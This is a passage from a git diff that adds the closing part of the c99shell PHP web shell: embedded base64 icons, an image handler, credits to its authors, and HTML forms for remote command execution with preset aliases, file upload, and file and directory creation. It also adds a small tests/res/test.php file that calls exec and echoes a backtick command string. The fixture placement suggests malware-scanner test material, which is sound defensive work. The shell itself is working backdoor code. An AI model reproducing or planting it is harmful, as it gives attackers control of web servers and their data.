+"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". +"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI". +"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=", +"ext_mp3"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". +"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". +"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", +"ext_avi"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM". +"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4". +"PYXCyg+V2i44XeRmSfYqsGhAAgA7", +"ext_cgi"=> +"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9". +"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6". +"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S". +"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ". +"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM". +"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD". +"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi". +"RYtMAgEAOw==", +"ext_cmd"=> +"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI". +"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN". +"dmrYAMn1onq/YKpjvEgAADs=", +"ext_cpp"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC". +"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra". +"Eq7YrLDE7a4SADs=", +"ext_ini"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL". +"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM". +"SnEjgPVarHEHgrB43JvszsQEADs=", +"ext_diz"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs". +"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv". +"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3". +"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr". +"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX". +"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA". +"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW". +"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK". +"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm". +"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg". +"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF". +"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA". +"Ow==", +"ext_doc"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR". +"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq". +"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=", +"ext_exe"=> +"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7". +"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt". +"xhIAOw==", +"ext_h"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB". +"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo". +"Wq/NknbbSgAAOw==", +"ext_hpp"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF". +"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR". +"UqUagnbLdZa+YFcCADs=", +"ext_htaccess"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6". +"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ". +"AAA7", +"ext_html"=> +"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz". +"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P". +"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk". +"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR". +"ADs=", +"ext_jpg"=> +"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci". +"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd". +"FxEAOw==", +"ext_js"=> +"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH". +"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs". +"a00AjYYBbc/o9HjNniUAADs=", +"ext_lnk"=> +"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO". +"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi". +"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk". +"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG". +"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5". +"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf". +"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ". +"ADs=", +"ext_log"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN". +"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==", +"ext_php"=> +"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg". +"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==", +"ext_pl"=> +"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo". +"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7", +"ext_swf"=> +"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O". +"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA". +"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC". +"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=", +"ext_tar"=> +"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC". +"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF". +"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD". +"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p". +"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg". +"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd". +"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB". +"u4tLAgEAOw==", +"ext_txt"=> +"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ". +"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7". +"UpPWG3Ig6Hq/XmRjuZwkAAA7", +"ext_wri"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". +"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", +"ext_xml"=> +"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". +"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". +"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". +"IQA7" + ); + //For simple size- and speed-optimization. + $imgequals = array( + "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), + "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"), + "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"), + "ext_html"=>array("ext_html","ext_htm"), + "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"), + "ext_lnk"=>array("ext_lnk","ext_url"), + "ext_ini"=>array("ext_ini","ext_css","ext_inf"), + "ext_doc"=>array("ext_doc","ext_dot"), + "ext_js"=>array("ext_js","ext_vbs"), + "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"), + "ext_wri"=>array("ext_wri","ext_rtf"), + "ext_swf"=>array("ext_swf","ext_fla"), + "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"), + "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so") + ); + if (!$getall) + { + header("Content-type: image/gif"); + header("Cache-control: public"); + header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); + header("Cache-control: max-age=".(60*60*24*7)); + header("Last-Modified: ".date("r",filemtime(__FILE__))); + foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}} + if (empty($images[$img])) {$img = "small_unk";} + if (in_array($img,$ext_tar)) {$img = "ext_tar";} + echo base64_decode($images[$img]); + } + else + { + foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}} + natsort($images); + $k = array_keys($images); + echo "<center>"; + foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";} + echo "</center>"; + } + exit; +} +if ($act == "about") {echo "<center><b>Credits:<br>Idea, leading and coding by tristram[CCTeaM].<br>Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].<br>Thanks all who report bugs.<br>All bugs send to tristram's ICQ #656555 <a href=\"http://wwp.icq.com/scripts/contact.dll?msgto=656555\"><img src=\"http://wwp.icq.com/scripts/online.dll?icq=656555&img=5\" border=0 align=absmiddle></a>.</b>";} +?> +</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> +<tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Command execute</b></a> ::</b></p></td></tr> +<tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1"> <input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1"> <input type=submit name=submit value="Execute"></form></td></tr></TABLE> +<br> +<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> +<tr> + <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=search&d=<?php echo urlencode($d); ?>"><b>Search</b></a> ::</b><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)"> <input type="checkbox" name="search_name_regexp" value="1" checked> - regexp <input type=submit name=submit value="Search"></form></center></p></td> + <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=upload&d=<?php echo $ud; ?>"><b>Upload</b></a> ::</b><form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1"> <input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td> +</tr> +</table> +<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Make Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>"> <input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Make File ::</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit"> <input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table> +<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Go Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>"> <input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Go File ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>"> <input type=submit value="Go"></form></center></td></tr></table> +<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c99shell v. <?php echo $shver; ?> <a href="<?php echo $surl; ?>act=about"><u><b>powered by</b></u></a> Captain Crunch Security Team | <a href="http://ccteam.ru"><font color="#FF0000">http://ccteam.ru</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></p></td></tr></table> +</body></html><?php chdir($lastdir); c99shexit(); ?> diff --git a/tests/res/test.php b/tests/res/test.php new file mode 100644 index 0000000000000000000000000000000000000000..4713678a5e3cfa6090105f520ac6eaa5fdac6836 --- /dev/null +++ b/tests/res/test.php @@ -0,0 +1,10 @@ +<?php + +function test() +{ + echo "ok"; +} +$Æ = "test"; +echo $Æ; +echo "ls -\`al\`"; +exec("date");